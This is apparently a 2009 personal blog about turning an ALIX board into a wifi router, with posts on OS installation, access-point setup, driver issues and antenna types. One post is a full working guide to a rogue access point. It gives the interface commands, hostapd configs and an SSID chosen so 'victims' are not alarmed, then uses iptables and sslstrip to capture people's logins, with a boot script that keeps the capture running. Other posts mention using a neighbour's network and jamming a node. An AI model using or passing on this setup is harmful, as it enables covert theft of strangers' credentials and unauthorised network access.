Thursday, July 30, 2009

The stuck bacon nightmare

Everything was going so well that it could not continue. The driver is giving me stuck beacons that reset the AP and make it unusable. RAA

wifi0: ath_bstuck_tasklet: Stuck beacon; resetting (beacon miss count: 11)


This is a well known issue, though. Some people try to tweak the parameters, others have some voodoo techniques that did not work for me. Now I am patching ath5k to support master mode, but it is not really working.

Now, I am trying the wireless-testing branch of the kernel, with the last drivers available, we'll see...

EDIT: Finally, I tried a bunch of different stuff to make it work, without success. However, I was able to decrease somehow the number of Stuck beacon by doing the following:
  1. Downloading madwfi on the repository (http://madwifi-project.org/svn)
  2. in ath/if_ath_pci.c, we can tweak the PCI latency: pci_write_config_byte(pdev, PCI_LATENCY_TIMER, 0x20);
  3. Do the voodoo stuff as described in here
  4. You can try to switch to ath5k, but master mode was not really successful on my side.

Sunday, July 26, 2009

A very rogue access point: MITM is BACK !

My alix3d3 is becoming little by little a nice Wifi powered router/access point. Previously, we have seen how to make an access point from it. Now, we will see how to make a home router and even more.

For our experiment, I will use an AR5413 based card (ath_pci module). The network infrastructure looks the following:



Basically, we have the physical interface (wifi0) and on the top of that, we create 3 different virtual interfaces:
  1. ath0: an encrypted interface, we use for example wpa2.
  2. ath1: an open interface on which everybody will be able to connect. On this one we will perform a "Man-in-the-middle" attack.
  3. ath2: is our interface that is in "managed" mode, and will be the one that will provide Internet. It could be an ethernet interface.


Now that we have in mind the network map, we can start working. we will separate the work in different steps:
  1. Create the virtual interfaces
  2. create the access points with hostapd
  3. Provide internet
  4. Set the man in the middle
  5. automate this for the next reboot.

The first step is to create the 3 different interfaces:


wlanconfig ath0 destroy; wlanconfig ath0 create wlandev wifi0 wlanmode ap; ifconfig ath0 192.168.100.1 netmask 255.255.255.0
wlanconfig ath1 destroy; wlanconfig ath1 create wlandev wifi0 wlanmode ap; ifconfig ath1 192.168.101.1 netmask 255.255.255.0
wlanconfig ath2 destroy; wlanconfig ath2 create wlandev wifi0 wlanmode managed; ifconfig ath2 up


The output sould be something like:

> ifconfig

ath0 Link encap:Ethernet HWaddr 0E:FC:CB:2D:54:1A
inet addr:192.168.100.1 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::4c0:caff:fe1f:442b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

ath1 Link encap:Ethernet HWaddr 0E:FC:CB:2D:54:1A
inet addr:192.168.101.1 Bcast:192.168.101.255 Mask:255.255.255.0
inet6 addr: fe80::8c0:caff:fe1f:442b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

ath2 Link encap:Ethernet HWaddr 0E:FC:CB:2D:54:1A
inet6 addr: fe80::cc0:caff:fe1f:442b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

> iwconfig

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Master Frequency:2.462 GHz Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-83 dBm Noise level=-83 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

ath1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Master Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-83 dBm Noise level=-83 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

ath2 IEEE 802.11g ESSID:"" Nickname:""
Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-83 dBm Noise level=-83 dBm
Rx invalid nwid:9 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


If you set an ESSID for the interface ath0 and ath1, you will be able to connect right away. However, we want to add some security to ath0. For this, we will use hostapd. We will write two different hostapd.conf files, one for each ap (ath0 and ath1).

Here is the output for the open access point, I did not change from the default settings.


interface=ath1 ****
driver=madwifi ****
logger_syslog=1
logger_syslog_level=1
logger_stdout=1
logger_stdout_level=1
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
ssid=NETGEAR-211 ****
hw_mode=g ****
channel=1 ****
beacon_int=300 ****
dtim_period=2
max_num_sta=5
rts_threshold=2347
fragm_threshold=2346
acaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wme_enabled=1
wme_ac_bk_cwmin=4
wme_ac_bk_cwmax=10
wme_ac_bk_aifs=7
wme_ac_bk_txop_limit=0
wme_ac_bk_acm=0
wme_ac_be_aifs=3
wme_ac_be_cwmin=4
wme_ac_be_cwmax=10
wme_ac_be_txop_limit=0
wme_ac_be_acm=0
wme_ac_vi_aifs=2
wme_ac_vi_cwmin=3
wme_ac_vi_cwmax=4
wme_ac_vi_txop_limit=94
wme_ac_vi_acm=0
wme_ac_vo_aifs=2
wme_ac_vo_cwmin=2
wme_ac_vo_cwmax=3
wme_ac_vo_txop_limit=47
wme_ac_vo_acm=0
eapol_key_index_workaround=0
eap_server=0
own_ip_addr=127.0.0.1

I added an arrow where the default parameters must be changed. One might wonder "why are we setting such an ESSID "NETGEAR-211" ?" The reason is that if you put something like "free_wifi", it might alarm the person who wants to connect (free wifi ? Why ? sounds weird), whereas NETGEAR is the default essid for netgear ap's. I added a "-211" to know that it is mine.

For the other access point, we do almost the same, but this time with wpa enabled:

interface=ath0
driver=madwifi
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
ssid=blabla *****
hw_mode=g
channel=1
beacon_int=300
dtim_period=2
max_num_sta=255
rts_threshold=2347
fragm_threshold=2346
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wme_enabled=1
wme_ac_bk_cwmin=4
wme_ac_bk_cwmax=10
wme_ac_bk_aifs=7
wme_ac_bk_txop_limit=0
wme_ac_bk_acm=0
wme_ac_be_aifs=3
wme_ac_be_cwmin=4
wme_ac_be_cwmax=10
wme_ac_be_txop_limit=0
wme_ac_be_acm=0
wme_ac_vi_aifs=2
wme_ac_vi_cwmin=3
wme_ac_vi_cwmax=4
wme_ac_vi_txop_limit=94
wme_ac_vi_acm=0
wme_ac_vo_aifs=2
wme_ac_vo_cwmin=2
wme_ac_vo_cwmax=3
wme_ac_vo_txop_limit=47
wme_ac_vo_acm=0
eapol_key_index_workaround=0
eap_server=0
own_ip_addr=127.0.0.1
wpa=1
wpa_passphrase=yeahthisisagoodpass ******
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP

Now we can lauch our two instances of hostapd:

hostapd -B /etc/hostapd/hostapd.conf
hostapd -B /etc/hostapd/hostapd_freewifi.conf

You should now be able to connect to the each of these aps, using static IP addresses.

To get internet, we should still configure ath2 to forward the packets:

iwconfig ath2 essid voisin key 78:02:15:20:23
dhcpcd ath2
[...]
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o ath2 -j MASQUERADE

Now you should be able to have internet by connecting on ath0 and ath1. Good :)

We want our victims to connect on our AP extremely easily, hence we need at least a dhcp server to give them an IP address. For this, I chose "dnsmasq", because it is very easy to configure. In the same time, we will provide a DNS cache to boost our dns requests.


# cat /etc/dnsmasq.conf
listen-address=192.168.100.1,192.168.101.1,127.0.0.1
dhcp-range=192.168.100.50,192.168.100.150,255.255.255.0,12h
dhcp-range=192.168.101.50,192.168.101.150,255.255.255.0,12h
log-dhcp

You can see what is happening in /var/log/message when someone does a DHCP request. Note that we provide no interface in here, in order to respond to all the dhcp request comming on the different interfaces. Thus, even ath0 will profit of the DHCP server.

/etc/rc.d/dnsmasq start


At this point, we have two working APs providing internet. We want not to do some devil stuff, by stealing people's accounts in a very discrete fashion. I thought for a while about which was the best way to do this. A long time ago, I was using ettercap, but for the router, it is not very a good choice. Then I was wondering if dsniff suite could do the job. It does, but I was not really convinced. You know, when you connect to a website requiring a ssl certificate, if you are using ettercap, you will get some huge WARNING all the way around. This is not what I call "discrete".

Anyways, after few minutes, I found a tool called sslstrip. This tool has been presented at blackhat last year and does a pretty good job. I let you see on their website how it works for more info. To make it work, it is damn easy:

iptables -i ath1 -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f -w ./verycool.txt

Note that iptables is acting on ath1. Now if you try to connect on the open AP, guess what happens ? I was surprised to see how well it works. The drawback is that it slows down a bit the connection.

Now, we don't want to redo this every time the alix reboots. I modified the /etc/rc.d/hostapd into /etc/rc.d/hostapd_mod:

> less /etc/init.d/hostapd_mod
#!/bin/bash

. /etc/rc.conf
. /etc/rc.d/functions

case "$1" in
start)
stat_busy "Destroying and creating ath0"
wlanconfig ath0 destroy; wlanconfig ath0 create wlandev wifi0 wlanmode ap; ifconfig ath0 192.168.100.1 netmask 255.255.255.0
stat_busy "Destroying and creating ath1"
wlanconfig ath1 destroy; wlanconfig ath1 create wlandev wifi0 wlanmode ap; ifconfig ath1 192.168.101.1 netmask 255.255.255.0
stat_busy "Starting hostapd"
sleep 1
/usr/bin/hostapd -B -P /var/run/hostapd.pid /etc/hostapd/hostapd.conf &> /dev/null
/usr/bin/hostapd -B -P /var/run/hostapd.pid2 /etc/hostapd/hostapd_freewifi.conf &> /dev/null
stat_busy "Starting sslstrip"
iptables -i ath1 -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
stat_busy "Destroying and creating ath2"
wlanconfig ath2 destroy; wlanconfig ath2 create wlandev wifi0 wlanmode managed;
iptables -t nat -A POSTROUTING -o ath2 -j MASQUERADE
sslstrip -p -f -w /home/root/cool_stuff-`date +"%H-%M-%m-%d"`.txt &
if [ $? -gt 0 ]; then
stat_fail
else
stat_done
add_daemon hostapd
fi
;;
stop)
stat_busy "Stopping hostapd"
[ -f /var/run/hostapd.pid ] && kill `cat /var/run/hostapd.pid` && kill `cat /var/run/hostapd.pid2` && killall sslstrip &> /dev/null
if [ $? -gt 0 ]; then
stat_fail
else
stat_done
rm_daemon hostapd
fi
;;
restart)
$0 stop
sleep 1
$0 start
;;
*)
echo "usage: $0 {start|stop|restart}"
esac

This is probably not the cleanest way to do, but it works pretty well. However, ath2 does not connect to the AP here (manually for now).

/etc/rc.conf has the following:


DAEMONS=(network sshd crond dnsmasq hostapd_mod)

lo="lo 127.0.0.1"
eth0="eth0 192.168.2.3 netmask 255.255.255.0 up"
ath0="ath0 192.168.101.1 netmask 255.255.255.0 up"
ath1="ath1 192.168.100.1 netmask 255.255.255.0 up"
ath1="ath1 up"
INTERFACES=(eth0 ath0 ath1 ath2)


Obviously, an easy way to circumvent this MITM is to use a VPN for example or an encrypted connexion.

Thursday, July 23, 2009

Hex to dec to bin conversion

There exist a plethora of different manners to convert numbers. Some use bc, others use the shell, but there is a small program that does the trick pretty well: pcalc.

Look at the output:


> pcalc 3124
3124 0xc34 0y110000110100
> pcalc 0x5349-99
21222 0x52e6 0y101001011100110


Simple and effective, that's it.

Tuesday, July 21, 2009

alix3d3: issue when booting up

The router is almost ok, now I am trying to boot the board. However, when no screen is attached, it hangs at boot time, after displaying an error message with "edd". I tried to disable it, it didn't help.. I've no clue yet, but I'm investigating. Since I don't have any screen in here, it makes thinks more difficult :P...


EDIT: some guy (Chris) proposed a genius idea:

Get a paperclip and carefully insert into the VGA header plug, shorting pin 6 to pin 12 (middle row far right to bottom row 2nd from the right). Whenever you don't have a monitor attached leave the paperclip in. Your Alix 3c3 will now boot up without a monitor attached.


So greats to him :).

According to Wikipedia, Pin 6 = Red return and Pin 12 = PC Data, then it makes sense to bridge them.

Apparently, CONFIG_FIRMWARE_EDID=n should fix it, too.

Saturday, July 18, 2009

IP forwarding for the dummies

How many times I am configuring a box and I don't have access to Internet.
Here is a simple and effective way to transform your laptop as an IP forwarder.

Suppose that you are configuring the alix3d3 and you don't have access to Internet, but your laptop does. We want to connect a wire between the alix3d3 and the laptop. Here is what to do:

-> On your laptop:


ifconfig eth0 192.168.2.2 # set a static ip address to eth0
echo 1 > /proc/sys/net/ipv4/ip_forward # set forwarding
iptables -t nat -A POSTROUTING -o ${IFACE_NET} -j MASQUERADE


Note that ${IFACE_NET} is the interface from where you get your internet access. Usually, if it is by wifi, it is ath0 or wlan0.

-> On the other box:

ifconfig eth0 192.168.2.3
route add -net default gw 192.168.2.2

Make sure your /etc/resolv.conf is not empty. You can still use a public dns server.

That's all, now you are able to get internet from your box, using the laptop.

alix3d3: towards an access point

Now that we have a running operating system (Arch linux in this case), the next step I would like to do is to configure my box as an access point, to act as my old dd-wrt router.

There are already good topics on the subject, like here or here.

To test my network, I am using 3 computers (you can do it with VMs though):
  1. A laptop: it will be my "client".
  2. A fix computer: it will act as my ISP.
  3. Alix3d3: it will act as my wireless access point (WAP).
As you can see in the picture, the client connects to the WAP by the air (hence the name :P) and the AP connects to the server with a wire. The server runs a simple dhcp server.

To have this configuration, here is what we need to do:

On the server, we need to install the dhcp server. I decided to use dnsmasq, because it is very easy to configure and fits well for my small network.

To do so, on the server, simply add to your /etc/dnsmasq.conf the next lines. Note that it is not mandatory to explicitly write the interface, but I find it cleaner. The log-dhcp will bring helpful information about what is going on, in /var/log/message (just do a 'tail -f' on it).

dhcp-range=192.168.2.50,192.168.2.150,3d
interface=eth0
log-dhcp

Once you set it up, you boot the dnsmasq service, usually by doing something like
ifconfig eth0 192.168.2.1
/etc/init.d/dnsmasq start
You can test that everything is working properly, by connecting the alix3d3 board to the server and run a

dhcpcd eth0

Now that we have a dhcp server available, we need to configure the access point. To make it simple, I decided to configure the simplest access point, ie without any encryption (for now).

The wireless card is using the madwifi driver. As you know, madwifi does not do exactly follow the same way as the other drivers, since it is using its wlanconfig tool.
Basically, since we want to set our card as an access point, we have to do:

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode ap

Now you have your card in master mode, you can verify it by doing a iwconfig.

To me, an access point only offers the "wire". In a sense, it is like when 2 people do not speak the same language, and a person comes in the middle speaking both languages. The first person speaks to the person of the middle whose will translate it to the second person.

In our case, a bridge will do the job: all the data coming in the air will be passed to wire and vice-versa. This is not a big deal to make one, the man page of brctl describes it pretty well.


brctl addbr br0 # creates the bridge
brctl addif br0 eth0 # adds eth0 to the bridge
brctl addif br0 ath0 # adds ath0 to the bridge
brctl show # shows what we did
bridge name bridge id STP enabled interfaces
br0 8000.000db917b374 no ath0
eth0
To set up the access point, we will use hostapd, the IEEE 802.11 wireless LAN Host AP daemon.

To make it simple, here is my configuration for /etc/hostapd/hostapd.conf. I did not change the default values, I just modified the ssid to pliplop and modified the interface correctly (ath0).


interface=ath0
bridge=br0
driver=madwifi
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
ssid=pliplop
hw_mode=g
channel=1
beacon_int=100
dtim_period=2
max_num_sta=255
rts_threshold=2347
fragm_threshold=2346
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wme_enabled=1
wme_ac_bk_cwmin=4
wme_ac_bk_cwmax=10
wme_ac_bk_aifs=7
wme_ac_bk_txop_limit=0
wme_ac_bk_acm=0
wme_ac_be_aifs=3
wme_ac_be_cwmin=4
wme_ac_be_cwmax=10
wme_ac_be_txop_limit=0
wme_ac_be_acm=0
wme_ac_vi_aifs=2
wme_ac_vi_cwmin=3
wme_ac_vi_cwmax=4
wme_ac_vi_txop_limit=94
wme_ac_vi_acm=0
wme_ac_vo_aifs=2
wme_ac_vo_cwmin=2
wme_ac_vo_cwmax=3
wme_ac_vo_txop_limit=47
wme_ac_vo_acm=0
eapol_key_index_workaround=0
eap_server=0
own_ip_addr=127.0.0.1


We are ready to launch the hostap deamon...

Everything sounds to be working by now. We will try connect with the client now.


iwconfig wlan0 essid pliplop
dhcpcd wlan0
wlan0: dhcpcd 4.0.13 starting
wlan0: broadcasting for a lease
wlan0: offered 192.168.0.82 from 192.168.0.1
wlan0: ignoring offer of 192.168.2.82 from 192.168.2.1
wlan0: acknowledged 192.168.0.82 from 192.168.0.1
wlan0: checking 192.168.0.82 is available on attached networks
wlan0: leased 192.168.0.82 for 259200 seconds


ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:15:6d:53:01:d2
inet addr:192.168.2.82 Bcast:192.168.2.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4235 errors:0 dropped:0 overruns:0 frame:0
TX packets:4179 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2448884 (2.3 MiB) TX bytes:372396 (363.6 KiB)


As you can see, we received an ip address 192.168.2.82, which is in the pool of IP addresses we set up before on the server. We see that the access point acts transparently, like if we had pulled a direct wire between the client and the server. It is also worth to notice that on the alix3d3, you did not give any ip address neither for the eth0, nor for the ath0 interfaces. This makes sense, since IP addresses are one layer above the one we are working with.

Finally, if you want to configure your alix3d3 further on, you can do a for example a dhcpcd br0 on the WAP: the server will offer it an IP address and you'll be able to access it.

This is not too bad for the moment, but I my alix3d3 to act not only as an access point, but also as a router, thus I'll be able to do more advanced features. The next step is thus to configure a router on top of that.

Saturday, July 4, 2009

Alix3d3: first impression + OS installation




I finally got my alix3d3 board, from pcengines that will replace my router. I also bought a 4GB compact flash and a Wifi mini-pci card (WLM54GP23), with an atheros chipset. The box has a VGA output, but also audio in/out, but I don't really care about that. It also has a RJ45 connector, 2 USBs and a Serial connection, this is interesting !


The first thing to do is to chose the operating system that will run on it. We have 256MB of Ram, and an AMD Geode running at a clock speed of 500MHz. I want a VERY light weight operating system, with a minimal set of packages. Moreover, I don't wanna compile anything on it, it's gonna be too slow, and it will overuse the CF card. So first, I tried "Slitaz", which is a Swiss linux distribution, known to be extremely light. This distribution comes with a 2.6.25 kernel, and you have a neat system of binary packages. That sounded good, until I started to hack around. Actually, as soon as you want to upgrade the kernel, you must do it yourself, and it seems that the community is not really reactive (packages are old, etc). I just want something light that I "run and install", without having to hack too much like on my gentoo.

I decided to give up with Slitaz, and move to archlinux, which is based on gentoo and I always wanted to try it. I downloaded the iso file from their FTP and ran it into VMWare. I attached my card reader to the VM and from here I've been able to install my system within a half hour. I am used to do purely manual installation, from partitioning to kernel configuration and selecting my packages one by one, but here, you have a nice UI (dialog), asking what you wanna do. I selected "auto partitioning", and it did the job for me. First impression is pretty good !

Next, it asked me for which packages I wanted to install. Again, it has a small list (sounds like a bsd install), and you just select the packages you want to be installed, including the kernel. It is going to download directly the last release of each package (provided you chose the FTP/HTTP installation method) and install them without any human intervention, that was exactly what I was looking for.

However, when you let the software doing what it wants, you may end up with some undesired behaviors. I had some issues with GRUB, it was configured in a very weird way, so I had to manually modify it. Then, I got issues when booting the kernel, actually the image was kind of corrupted. Hopefully, there is a "fallback" mode you can chose to help debugging. Fortunately, I found the mkinitcpio (Create an initial ramdisk environment) being very helpful here and helped in fixing the different issues I had.

Another problem is that you have tones of modules that are loaded at boot-time, and my wireless cards where recognized, but I was not able to set them in Master Mode (access point). Actually, it was due to the ath5k module, not supporting the Master Mode. Hopefully, the ath_pci module from madwifi-ng works just great and let you set the interface in Master mode. I just added MODULES=("!ath5k ath_pci ath_hal") in the /etc/rc.conf file in order to ignore the ath5k module and load the ath_pci one.

It's a happy story end, the system is ready, boots in about 15 seconds, recognizes the wifi cards and required very little effort to install. Moreover I like the way to install and maintain packages with pacman.

Now that the box is ready, we will be able to hack the wifi ! Stay tuned, I'll be back in 2 weeks ;) !

A comparison between 3 different types of antenna

Now that we have a way to get the Internet connection from the neighborhood, we want to optimize the signal strength. Actually, we want to maximize the signal, but keep the noise as low as possible. We will call the ratio Signal/Noise a SNR. The Signal & Noise are measures in decibel isotropic (dbi). To simplify, we will say that a dbi is the same measure as a db, applied to an antenna.
The isotropic antenna is the "perfect" antenna that radiates in all the direction with the same magnitude, with no loss. In other words, the isotropic antenna has no preferred direction of radiation.

Radiation of a punctual isotropic antenna

Without digging too much into details, the comparison of the highest peaks of the antenna with the isotropic one gives us the Gain; we will assume that the bigger the SNR is, the best the reception will be.

Usually, an antenna has a horizontal plane pattern called an azimuth, and a vertical plane pattern, called the elevation.

Good, now we are interested for the end-user, which antenna is/are the best ?

  • Omnidirectional antenna
An omnidirectional antenna is an antenna system which radiates power uniformly in one plane with a directive pattern shape in a perpendicular plane. This pattern is often described as "donut shaped".

The image of the donut is good (this is a dipole here):

Azimuth of the donuts, the emitter is in the middle.

This shape can be achieved by a typical 1/2-wave dipole. Hum, for wireless, 1/2-wave means around a 6cm dipole.



When increasing the size of your antenna, the azimuth goes smoother. To give an example, imagine that you are living at the 3rd floor of a building. If you've a small omnidirectional antenna, people from the ground floor will be able to catch your signal. If you increase the size of your antenna, people from the ground floor won't be able to capt it anymore (and vice-versa), but it will reach more people horizontally.

Typically, this kind of antenna is cool when wardriving, but for everyday, especially if you stay at the same point (ie at home), it's not very useful. Suppose you fix it on your balcony, do you really care about the backward radiation ? We want then a more directive antenna to maximize the [forward] gain.

Finally, it is nice to notice that an omnidirectional antenna does depend on the wavelength (and obviously on the frequency), thus an antenna used for FM radio (100MHz) will be much bigger than an omnidirectional antenna used for Wifi (2.4 GHz). This also explain why the car antennas were so big few years ago, now electronic tries to replace them, but usually an inadequate antenna requires a damn lot of power... so maybe the solution for cellphone to have a longer battery life is simply to add them an antenna ? Yes, probably, but it wouldn't fit into your pocket anymore.
  • Yagi-Uda antenna




This antenna became famous with the advent of the television. This is widely used for terrestrial transmission. This is already a directional antenna, where the dipoles are working in a synergistic way. Mathematically, it is pretty difficult to understand the exact way it works, but intuitively, the signal is "driven" by the dipoles. The gain of the antenna can be approximated by

GT = 1.66 * N

Where N is the number of dipoles (source: Wikipedia). It also means that the taller is the antenna, the highest is the gain. Again, it is worth to notice that the distance of the dipoles depends on the wavelength (1/10 of the wave length) and thus, the Yagi-Uda antenna is not a universal antenna, ie an antenna working for Wifi won't work for TV for example.


Its [forward] radiation pattern looks like a pear. This antenna is a good trade off between the omnidirectional antenna and the parabolic one: it offers a good gain without having to be too precise when pointing. Moreover, we have essentially a forward radiation pattern, which is what we are looking for when being on a fixed point. Indeed, we try to minimize the backward radiation, which is usually not really desired.

The Yagi antenna is very easy to do - or to buy on eBay :P - and is an antenna of choice when you need something discrete / light, to take with when you go on vacation for example. If you are looking for a maximum gain, this is probably not the one you'd choose.

Finally, in the same family, you have the log-periodic antenna, which is a derivative of the Yagi-Uda. In the log-periodic antenna, each dipole is smaller than the previous (how much smaller do you think ?).



  • Parabolic antenna
This family of antenna is extremely well known due to its use in satellite communication. Moreover, its principle of radiation is easy to understand, because one may do analogy with optical theory. Basically, it works like a lens.

What is cool about parabolic antenna, is that they are universal: one antenna working for Wifi can work for other purpose. Moreover, the gain is directly linearly proportional to the area of your antenna, meaning that the biggest is your antenna, the more gain it will have.



As an analogy, we can see the parabolic antenna as a laser: it is difficult to point on the right place, but when it is pointed right, you get the maximum SNR. Note that the radiation pattern has a sort of unwanted "flower" radiating backward.
The higher the gain, the more peaks you'll have, the thinner will be the forward radiation pattern, the more difficult it will be to point on the desired direction.

Typically, this is the antenna I prefer, when you don't have to move it. It is very difficult to point on the emitter (they are different techniques though), but once you get it, it's just awesome the SNR you get ! Sadly, this kind of antenna has only an efficiency of around 50% :(. Moreover, it is cumbersome: an antenna of 24dbi has a 1 meter diameter... so it's not a good choice when traveling. However, producers try to make them pretty light, since they are not full like the TV parabolas, that's why they have the denomination of grid. It does not impede the signal while tremendously reducing the weight. So you might guess why not doing that for TV sats ? I let you think a bit about that.

Note that with a parabolic antenna, you might introduce the hidden node problem, hence RTS/CTS becomes a need. Moreover, when dealing with big distances, other problems may occur, but we will probably talk about this later on.

There exists many more antennas, like the cantenna (the famous pringle box), the "panel antenna" that can have an efficiency up to 90%, but these are those I had the opportunity to try. Depending on your needs, the choice of the antenna can be very important. For example, if you decide to gather information about your surrounding neighbourgs, you'll choose an omnidirectional antenna, whereas if you are trying to jam a special node, a high gain antenna will do its job.

Antennas are a wild topic, sometimes difficult to express purely mathematically and they usually require deep analysis to exactly now the radiation pattern. There is so much to say about antennas that it cannot be resumes in one post and to fully understand them, it requires a deep understanding in electromagnetism. However, I just wanted to give an insight about how they work, and where they can be used.

Finally, I opted for the parabolic antenna, because I was looking for maximum gain, since I have big distances between houses. Next, we will see how to tweak your repeater to have the best internet possible.